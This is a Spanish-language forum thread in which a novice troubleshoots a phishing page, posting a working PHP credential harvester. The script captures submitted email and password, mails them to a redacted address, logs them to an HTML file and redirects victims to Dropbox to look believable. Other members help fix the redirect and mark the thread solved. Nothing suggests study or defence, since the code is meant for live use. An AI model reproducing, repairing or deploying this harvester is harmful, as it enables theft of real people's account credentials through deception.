[Problema] Phishing

Iniciado por neurotic, Mayo 13, 2015, 02:03:54 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Mayo 17, 2015, 07:25:17 AM #20 Ultima modificación: Mayo 17, 2015, 12:17:23 PM por Gabriela
Cambia la redirección por la que yo te dije (la de JS) y prueba de nuevo.

Dejo esto aquí para que la gente se haga una idea de tus conocimientos y pueda ayudarte en base a ellos. Lo has de añadir al html, no al PHP.

Saludos.
Contacto: @migueljimeno96 -

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
supongo que al php te refieres al
Código: text
login.php
que uso, que es el que puse arriba, porque si no evidentemente estoy perdido y no es por molestar

Código: text
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/

#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
      $headers = "From: $email";
      $message .= "

email: ".$Email."
pass: " .$Passwd."

___________________________________________________________________________________";

$message = stripslashes($message);
      $message = strip_tags ($message);

mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);

$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");

fclose($guardame);
//Redirecciona a la web original (facebook)
echo "<meta http-equiv='refresh' content='1;url=https://dropbox.com'>";
?>
el único cambio es el header y que redirecciona a "x" carpeta de dropbox para que sea más creíble.... todos los permisos otrogados y funcionaba hace dos semanas exactamente ese mismo... el html, la carpeta de los files y ese php es todo lo que subo, si se me escapa algo les agradezco el señalamiento

Gracias y saludos

Quita el meta y pon un header location, como ya te dijimos, ese php ya te lo corregí y te lo adjunté en un comentario anterior... lee bien el tema por favor.

Saludos.

un novato total, eso es claro... una carrera totalmente opuesta a la info o similares...

volviendo al tema, voy a seguir todos los pasos para ver como me va... estaba entretenido con lo del taller xss y algo que pusieron en el foro sobre hydra en cali y me desvié un poco...

gracias por las respuestas

Saludos

Atiendo al usuario vía MP.

Se marca el tema como solucionado.

Saludos.